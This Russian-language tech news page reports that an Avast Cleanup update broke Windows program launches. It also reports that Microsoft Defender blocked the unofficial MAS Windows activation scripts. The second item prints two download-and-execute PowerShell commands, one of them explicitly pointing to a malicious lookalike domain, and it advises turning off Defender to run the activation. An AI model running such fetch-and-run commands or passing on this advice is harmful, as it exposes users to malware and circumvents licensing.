По стопам Microsoft: Avast Cleanup сломал запуск программ в Windows 10

По стопам Microsoft: Avast Cleanup сломал запуск программ в Windows 10

По стопам Microsoft: Avast Cleanup сломал запуск программ в Windows 10

Выпущенное на днях обновление утилиты Avast Cleanup Premium сломало запуск некоторых программ в системах Windows 10. Браузеры, клиент Steam, приложения Microsoft Office и прочий софт выдаёт ошибку «Windows не может найти ...exe». Разработчики Avast в курсе данной проблемы.

Чешский антивирусный гигант выпустил новую версию Cleanup Premium в конце прошлой недели. Обновление автоматически установилось на компьютеры пользователей.

Согласно отдельным жалобам, после старта обновлённой версии утилиты перестали запускаться сторонние приложения. Например, при запуске Word система выдавала:

«Windows не может найти c:\program files\microsoft office\root\office16\winword.exe».

Как выяснилось впоследствии, утилита Avast Cleanup изменила значение «Debug» в реестре для каждой программы на «C:\Program Files\AVAST Software\Avast Cleanup\autoreactivator.exe».

Чтобы устранить проблему самым простым способом, нужно скачать Avast Cleanup по этой ссылке (.exe) и переустановить программу для отчистки компьютера от мусора.

Сама компания Avast Software также рассылает обновлённую версию через функцию автоматического обновления, однако стоит предупредить, что патч может дойти до вас не очень быстро.

Самое интересное, что ровно такую же проблему вызвали последние обновления Windows 10. Причина, судя по всему, та же.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru